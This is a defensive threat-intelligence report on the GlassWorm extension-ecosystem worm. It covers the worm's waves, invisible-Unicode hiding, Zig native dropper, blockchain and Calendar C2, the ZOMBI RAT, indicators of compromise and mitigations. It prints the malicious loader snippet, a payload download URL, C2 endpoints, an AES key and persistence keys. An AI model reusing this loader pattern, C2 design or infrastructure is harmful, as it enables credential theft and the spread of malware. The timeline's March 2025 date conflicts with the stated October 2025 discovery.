GlassWorm Campaign: Next-Generation Self-Propagating Worm Targeting the Entire Developer IDE Ecosystem
Executive Summary
GlassWorm is one of the most sophisticated and dangerous software supply chain attacks ever recorded against the developer ecosystem. First identified in October 2025 and still actively operating as of April 2026, GlassWorm has continuously evolved its techniques across successive attack waves, expanding from a handful of compromised extensions to hundreds of packages across multiple ecosystems.
Its core danger stems from three combined factors:
Invisible Code (Unicode Steganography): A technique that makes payloads completely invisible to the human eye and conventional code analysis tools
Impenetrable C2 Infrastructure: Leverages the Solana blockchain, Google Calendar, and BitTorrent DHT as command channels — impossible to take down
Self-Propagation: Stolen credentials are used to clone the worm into other packages and extensions autonomously, without attacker intervention
The latest variant (April 2026) marks a significant technical escalation: a native binary dropper written in the Zig programming language that infects every IDE on the victim's machine from a single point of entry.
Campaign Background & History
Origins — Connection to Shai Hulud
To fully understand GlassWorm, it must be placed in a broader context. Just one month before GlassWorm emerged, the security community witnessed Shai Hulud — the first self-propagating worm in the npm ecosystem — compromising over 100 packages by stealing npm tokens and automatically publishing malicious versions. GlassWorm is the direct successor and comprehensive upgrade of that attack model, targeting the VS Code extension ecosystem while adding unprecedented evasion techniques never seen before.
Campaign Evolution Timeline
| Date | Wave | Key Events & Techniques | Scale |
|---|---|---|---|
| March 2025 | 0 | Aikido first detects GlassWorm in npm packages hiding payloads via invisible Unicode | Small |
| Oct 17, 2025 | 1 | 7 OpenVSX extensions compromised; Unicode steganography first seen in VSX; "ZOMBI" RAT deployed | 35,800+ installs |
| Oct 19, 2025 | 1b | First Microsoft VSCode Marketplace extension detected (cline-ai-main.cline-ai-agent@3.1.3) |
— |
| November 2025 | 2 | 3 new extensions discovered (ai-driven-dev, history-in-sublime-merge, transient-emacs) |
~10,000 installs |
| Jan 31, 2026 | 3 | Socket detects new expansion wave; begins exploiting extensionPack/extensionDependencies fields |
— |
| March 2026 | 4 | 72 malicious extensions via transitive dependency abuse; 151 GitHub repos compromised; fake "Google Docs Offline" Chrome extension | Hundreds of thousands |
| Mar 16, 2026 | 5 | GlassWorm attacks MCP (Model Context Protocol) with new distribution techniques | — |
| Apr 8, 2026 | 6 | Zig native dropper: multi-IDE infection from a single extension | Actively spreading |
Technical Deep Dive (TTPs)
Technique 1: Unicode Steganography — "Invisible Malware"
This is GlassWorm's most defining and shocking technique when first discovered. The attacker uses Unicode Variation Selectors — special Unicode characters that produce no visible glyph whatsoever, but remain valid bytes that JavaScript interpreters can execute.
Practical consequences:
Inspecting the source code, developers see only blank lines or whitespace — but those are actually complete, functional malicious code blocks
GitHub diff view: Nothing unusual
IDE syntax highlighting: No detection
Manual code review: Entirely bypassed
Most SAST (Static Application Security Testing) tools: No detection
This represents a paradigm shift in the threat model: our entire security apparatus is built on the assumption that humans can read and audit code. GlassWorm has proven that assumption fundamentally false. The developer whose account was compromised likely looked at the very same file, saw their code perfectly intact, and unknowingly distributed malware to thousands of users.
Technique 2: Zig Native Dropper (Wave 6 — April 2026)
A malicious extension named specstudio.code-wakatime-activity-tracker was distributed on the OpenVSX Registry, outwardly appearing nearly identical to the legitimate WakaTime extension: same command registrations, same API key prompts, same status bar icons. The only divergence lies within the activate() function:
const bw = process.platform === "win32" ? "./bin/win.node" : "./bin/mac.node";
const { install } = require(bw);
install();
Before any WakaTime logic runs, the extension loads a native binary from the ./bin/ directory and immediately calls install(). These files are Node.js native addons — compiled shared libraries loaded directly into the Node.js runtime that execute entirely outside the JavaScript sandbox with full OS-level access.
Why Zig was chosen:
Produces small binaries with minimal forensic footprint
Low detection rates on antivirus/EDR solutions
Easy cross-compilation: the
mac.nodefile is a universal Mach-O binary, covering both x86_64 and arm64The macOS file was compiled with debug symbols, revealing the project path:
/Users/davidioasd/Downloads/vsx_installer_zig
Multi-IDE Infection — Full Target List:
On Windows (from win.node):
%LOCALAPPDATA%\Programs\Microsoft VS Code\bin\code.cmd
%LOCALAPPDATA%\Programs\Microsoft VS Code Insiders\bin\code-insiders.cmd
%LOCALAPPDATA%\Programs\cursor\resources\app\bin\cursor.cmd
%LOCALAPPDATA%\Programs\windsurf\resources\app\bin\windsurf.cmd
%LOCALAPPDATA%\Programs\VSCodium\resources\app\bin\codium.cmd
%LOCALAPPDATA%\Programs\Positron\resources\app\bin\positron.cmd
%ProgramFiles%\Microsoft VS Code\bin\code.cmd
%ProgramFiles%\Positron\resources\app\bin\positron.cmd
On macOS (from mac.node):
/Applications/Visual Studio Code.app/.../bin/code
/Applications/Visual Studio Code - Insiders.app/.../code-insiders
/Applications/Cursor.app/.../bin/cursor
/Applications/Windsurf.app/.../bin/windsurf
/Applications/VSCodium.app/.../bin/codium
/Applications/Positron.app/.../bin/positron
After enumerating all IDEs, the dropper downloads a malicious .vsix from an attacker-controlled GitHub Releases URL and silently installs it into every detected IDE via each editor's CLI installer:
https://github[.]com/ColossusQuailPray/oiegjqde/releases/download/12/autoimport-2.7.9.vsix
This extension impersonates steoates.autoimport — a legitimate extension with millions of installs. Upon completion, cleanupVsix deletes the downloaded file to erase evidence.
Technique 3: Transitive Dependency Abuse (Wave 4 — March 2026)
Since January 2026, GlassWorm has exploited two VS Code Extension manifest fields: extensionPack and extensionDependencies. The mechanism works as follows: the attacker publishes a seemingly benign extension first, then in a subsequent update, adds a reference in the extensionPack field pointing to another malicious extension. The IDE automatically installs that extension when the user updates the original one.
This means: auditing the first version of an extension's code is insufficient. The malware can appear in the 5th or 10th update, delivered through a completely different extension the user never knowingly installed. Socket Research confirmed this pattern via extension otoboss.autoimport-extension@1.5.7, which referenced oigotm.my-command-palette-extension — a GlassWorm loader.
Full Attack Chain
┌───────────────────────────────────────────┐
STAGE 1: INITIAL COMPROMISE
Fake extension → auto-update → loads Zig native binary (win/mac)
Bypasses JavaScript sandbox → executes with full OS privileges
└───────────────────────────────────────────┘
↓
┌───────────────────────────────────────────┐
STAGE 2: MULTI-IDE INFECTION
Enumerates all IDEs → downloads autoimport-2.7.9.vsix from GitHub
Silently installs into every IDE → deletes .vsix to cover tracks
└───────────────────────────────────────────┘
↓
┌───────────────────────────────────────────┐
STAGE 3: C2 DISCOVERY
Checks locale → If Russian locale: ABORT
Queries Solana blockchain → reads C2 address from memo field
Backup: Google Calendar event title (base64-encoded URL)
Payload: AES-256-CBC encrypted, key embedded in HTTP response hdr
└───────────────────────────────────────────┘
↓
┌───────────────────────────────────────────┐
STAGE 4: CREDENTIAL HARVEST
NPM tokens, GitHub tokens, Git creds, OpenVSX credentials
49 crypto wallet extensions (MetaMask, Phantom, Coinbase, etc.)
Browser cookies, localStorage, session data, keystrokes
Exfiltrate → ZIP archive → POST to /wall endpoint
└───────────────────────────────────────────┘
↓
┌───────────────────────────────────────────┐
STAGE 5: ZOMBI RAT DEPLOYMENT
SOCKS proxy server (converts victim into criminal infrastructure)
WebRTC P2P (direct firewall-bypassing control channel)
BitTorrent DHT C2 (decentralized, cannot be shut down)
Hidden VNC (HVNC) — fully invisible remote desktop
Persistence: Registry Run Keys + Scheduled Task (AghzgY.ps1)
└───────────────────────────────────────────┘
↓
┌───────────────────────────────────────────┐
STAGE 6: SELF-PROPAGATION
Uses stolen credentials → compromises additional packages/exts
Exponential worm loop: every victim becomes a new infection vector
└───────────────────────────────────────────┘
Three-Tier C2 Infrastructure — Near-Absolute Resilience
The most groundbreaking architectural feature of GlassWorm is its three independent C2 layers:
Tier 1 — Solana Blockchain (Primary C2): The C2 server's IP address is embedded in the memo field of a Solana transaction — a field that allows arbitrary text to be attached to blockchain transactions. A real-world example from an October 15, 2025 transaction:
{"link":"aHR0cDovLzIxNy42OS4zLjIxOC9xUUQlMkZKb2kzV0NXU2s4Z2dHSGlTdg=="}
Decoded from base64: http://217.69.3.218/qQD%2FJoi3WCWSk8ggGHiTdg%3D%3D
Why blockchain C2 is a near-unbeatable weapon:
Immutable: Cannot be deleted, modified, or taken down — exists permanently
Censorship-resistant: No hosting provider, no domain registrar to contact for takedown
Negligible cost: Updating to a new C2 costs approximately 0.000005 SOL (under $0.001)
Legitimate-looking traffic: Connections to Solana RPC nodes appear completely normal
Dynamic: The attacker can rotate infrastructure every 5 minutes if needed
Tier 2 — Google Calendar (Backup C2): The malware accesses a Google Calendar event created by the attacker. The event title contains a base64-encoded URL pointing to the /get_zombi_payload/ endpoint. The attacker simply edits the event to update the C2 address. No organization blocks Google Calendar.
Tier 3 — BitTorrent DHT (RAT C2): The ZOMBI RAT module receives commands via BitTorrent DHT network — the same decentralized mechanism that makes torrent tracking impossible to shut down. Even if both the blockchain and Google Calendar are blocked, the RAT continues operating via DHT.
ZOMBI RAT — A Full-Featured Remote Access Toolkit
The final payload — named ZOMBI by the attackers themselves (see the /get_zombi_payload/ endpoint) — is a complete remote control framework:
SOCKS Proxy Module: Converts the victim's machine into a proxy node within a global criminal network. Developer machines sitting inside corporate networks, behind company firewalls, can access internal systems that external attackers cannot reach. The attacker routes traffic through the victim's IP — every malicious action traces back to the unwitting developer.
WebRTC P2P Module: Establishes a direct control channel via NAT traversal, bypassing firewalls without a central server. The attacker can communicate in real-time with the victim machine even within highly secured enterprise network environments.
Hidden VNC (HVNC): A completely invisible remote desktop — runs within a virtual desktop that does not appear in Task Manager and displays no windows on the victim's screen. The attacker can:
Browse the web using the victim's active sessions
Read all source code and internal documentation
Access email, Slack, Jira, internal wikis
Pivot to other systems within the internal network
Fake "Google Docs Offline" Chrome Extension: ZOMBI force-installs a spoofed Chrome extension with the following capabilities:
Full-browser keylogger
Cookie and localStorage theft
DOM tree capture of the active tab
Full browsing history collection (up to 5,000 entries)
Periodic screenshots
Clipboard monitoring
Ledger/Trezor Phishing Binary: Particularly dangerous for hardware wallet users — if a connected Ledger or Trezor device is detected, this module launches a dedicated phishing flow designed to steal the user's seed phrase.
Persistence Mechanisms: ZOMBI installs two parallel persistence mechanisms:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateApp
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateLedger
Scheduled Task: "UpdateApp" → executes AghzgY.ps1
Self-Propagation Behavior (Worm Logic)
This is what transforms GlassWorm from an ordinary infostealer into a self-amplifying weapon. All stolen credentials are not only used for financial gain but also deployed to compromise additional packages:
NPM tokens → publish malicious versions of popular npm packages
GitHub tokens → inject backdoors into repositories, compromise CI/CD pipelines
OpenVSX credentials → push malicious extension updates to thousands of subscribers
Git credentials → compromise the organization's repositories
A single compromised developer can potentially distribute GlassWorm to the entire user base of every open-source project they maintain — with zero additional effort from the attacker. This is true worm behavior: exponential growth.
Attribution & Targeting
Threat Actor Characteristics
GlassWorm has not been formally attributed to any specific APT group or nation-state. However, several notable indicators exist:
Russian Locale Geofencing: Code explicitly checks the machine's locale — if Russian is detected, the entire execution chain aborts. This is a well-known technique used by cybercriminal groups seeking to avoid prosecuting users within Russian territory
Gmail Infrastructure: The C2 Google Calendar was created by
uhjdclolkdn@gmail.com— provides no additional attribution clarityHigh Technical Sophistication: Multi-language capability (JavaScript, Zig, Node.js native addons), deep understanding of blockchain mechanics, and distributed architecture — indicating a well-funded, highly organized threat group
Target Profiling
Primary Target: Software developers — particularly those using VS Code ecosystem, AI coding tools (Cursor, Windsurf), and holding cryptocurrency assets
Secondary Impact: Organizations employing targeted developers — via corporate network access, CI/CD pipeline compromise, and downstream supply chain attacks
End-User Risk: End users of compromised packages/extensions — millions of people can be affected from a single initially compromised developer
Full Indicators of Compromise (IoC)
Malicious Extensions (Selected List)
Wave 1 (Oct 2025) — OpenVSX:
| Extension ID | Malicious Version(s) |
|---|---|
codejoy.codejoy-vscode-extension |
1.8.3, 1.8.4 |
l-igh-t.vscode-theme-seti-folder |
1.2.3 |
kleinesfilmroellchen.serenity-dsl-syntaxhighlight |
0.3.2 |
JScearcy.rust-doc-viewer |
4.2.1 |
SIRILMP.dark-theme-sm |
3.11.4 |
ginfuru.better-nunjucks |
0.3.2 |
ellacrity.recoil |
0.7.4 |
Wave 1 (Oct 2025) — Microsoft VSCode Marketplace:
| Extension ID | Malicious Version |
|---|---|
cline-ai-main.cline-ai-agent |
3.1.3 |
Wave 6 (Apr 2026):
| Extension ID | Role |
|---|---|
specstudio.code-wakatime-activity-tracker |
Stage 1 dropper (Zig binary) |
floktokbok.autoimport / autoimport-2.7.9 |
Stage 2 implant |
5.2. File Artifacts
| File | Platform | SHA-256 |
|---|---|---|
win.node |
Windows | 2819ea44e22b9c47049e86894e544f3fd0de1d8afc7b545314bd3bc718bf2e02 |
mac.node |
macOS | 112d1b33dd9b0244525f51e59e6a79ac5ae452bf6e98c310e7b4fa7902e4db44 |
AghzgY.ps1 |
Windows | Persistence script |
Network Indicators
C2 / Payload Servers:
| IP / Domain | Role |
|---|---|
217.69.3[.]218 |
Primary C2 server (Wave 1) |
217.69.3[.]152 |
Primary C2 server (Wave 4) |
45.32.150[.]251 |
Active C2 (confirmed reuse) |
45.32.151[.]157 |
Additional C2 (Wave 4+) |
70.34.242[.]255 |
Additional C2 (Wave 4+) |
45.150.34[.]158 |
Additional C2 (Wave 4+) |
140.82.52[.]31:80/wall |
Exfiltration endpoint |
199.247.10[.]166 |
Primary C2 server (Wave 3) |
199.247.13[.]106:80/wall |
Exfiltration endpoint |
Blockchain Indicators:
| Type | Value |
|---|---|
| Solana Wallet (Wave 1) | 28PKnu7RzizxBzFPoLp69HLXp9bJL3JFtT2s5QzHsEA2 |
| Solana Wallet (Wave 3) | BjVeAjPrSKFiingBn4vZvghsGj9KCE8AJVtbc9S8o8SC |
| Solana Wallet (Wave 4+) | 6YGcuyFRJKZtcaYCCFba9fScNUvPkGXodXE1mJiSzqDJ |
| Google Calendar C2 | https://calendar.app.google/M2ZCvM8ULL56PD1d6 |
| Calendar Organizer | uhjdclolkdn@gmail.com |
Embedded Crypto Material:
| Type | Value |
|---|---|
| AES Key | wDO6YyTm6DL0T0zJ0SXhUql5Mo0pdlSz |
| AES IV (hex) | c4b9a3773e9dced6015a670855fd32b |
Forensic Strings (inside Zig binary):
| String | Source | Significance |
|---|---|---|
vsx_installer_zig |
macOS debug symbols | Zig project name |
davidioasd |
macOS binary path | Attacker's developer machine username |
Registry / Persistence Artifacts
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateApp
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateLedger
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Scheduled Task Name: "UpdateApp" → executes: AghzgY.ps1
Malicious Browser Extension
| Display Name | Directory (Windows) | Directory (macOS) |
|---|---|---|
| Google Docs Offline (v1.95.1) | jucku |
myextension |
MITRE ATT&CK Mapping
| Tactic | Technique ID | Description |
|---|---|---|
| Initial Access | T1195.001 | Supply Chain Compromise: Software Dependencies |
| Execution | T1204 | User Execution (extension install/update) |
| Execution | T1059.007 | JavaScript interpreter — Unicode-hidden payload |
| Defense Evasion | T1480 | Execution Guardrails (Russian locale check) |
| Defense Evasion | T1027.013 | Obfuscated Files — Invisible Unicode encoding |
| Command & Control | T1102.001 | Web Service: Dead Drop Resolver (Solana blockchain) |
| Command & Control | T1090 | Proxy — SOCKS5 via ZOMBI module |
| Command & Control | T1008 | Fallback Channels (Blockchain → Google Calendar → DHT) |
| Persistence | T1547.001 | Registry Run Keys / Startup Folder |
| Persistence | T1053.005 | Scheduled Task (UpdateApp) |
| Credential Access | T1528 | Steal Application Access Token (NPM, GitHub, OpenVSX) |
| Collection | T1056.001 | Keylogging (via Chrome extension) |
| Exfiltration | T1041 | Exfiltration Over C2 Channel (/wall endpoint) |
Enterprise Risk Assessment
Worst-Case Scenario
A single developer within an organization installing an infected extension can lead to:
All developer git credentials stolen → attacker gains read/write access to all of the company's private repositories
NPM/PyPI tokens leaked → attacker injects backdoors into production packages used by millions of end users
Developer machine becomes a SOCKS proxy → attacker can connect to the internal corporate network, bypassing all perimeter firewalls
HVNC grants full screen visibility — access to internal dashboards, admin panels, secrets management systems
Stolen credentials are weaponized to attack additional developers within the organization via supply chain
Defensive Recommendations
🚨 Immediate Response Actions
Immediately verify whether any extension in the IoC list is installed on any developer machine:
specstudio.code-wakatime-activity-tracker,floktokbok.autoimport, and all 72 extensions from the Wave 4 listSearch for
win.nodeormac.nodefiles within IDE extension directories (~/.vscode/extensions/)Audit all Chrome extensions — immediately remove any "Google Docs Offline" that is not published by Google
Check Registry Run Keys and Scheduled Tasks for entries named
UpdateApp,UpdateLedger,AghzgY.ps1If infection is confirmed: Treat the machine as fully compromised — immediately rotate all secrets: GitHub tokens, NPM tokens, AWS/GCP/Azure credentials, SSH keys, database passwords
🛡️ Medium and Long-Term Preventive Measures
Extension Governance:
Deploy an extension allowlist policy in enterprise environments — only permit installation of pre-approved extensions
Prefer the official VS Code Marketplace; carefully verify publisher identity (not just the extension name)
Monitor version-to-version diffs of installed extensions, with particular attention to updates that introduce new
extensionPackorextensionDependenciesentriesSet up alerts when an extension adds new dependencies, changes publisher, or undergoes unusually large code changes in a minor release
Infrastructure & Monitoring:
Monitor outbound traffic to Solana RPC nodes (
api.mainnet-beta.solana.com,solana-api.projectserum.com) from developer environmentsBlock all IPs in the IoC list at firewall and endpoint level
Detect unrecognized
.nodebinaries in IDE extension directoriesDeploy UEBA (User and Entity Behavior Analytics) to detect anomalous outbound connections originating from IDE processes
DevSecOps Hardening:
Integrate Software Composition Analysis (SCA) tools into CI/CD pipelines
Apply dependency pinning — use only specific, previously verified versions; disable auto-update
Use tools such as Aikido SafeChain and Socket CLI to inspect packages before installation
Consider network segmentation for developer workstations — restrict access to internal systems from developer machines
Conclusion
GlassWorm is the starkest warning on record about the severity of developer supply chain attacks. This campaign has demonstrated that:
Code review is no longer a reliable defense when malware can be completely invisible to human inspection
Blockchain-based C2 infrastructure is real, not theoretical — and is nearly impossible to take down
Self-propagating worms through the developer ecosystem can create a chain reaction impacting millions of end users
The campaign is still actively operating and continues to evolve. This is not a historical case study — this is a threat unfolding right now.
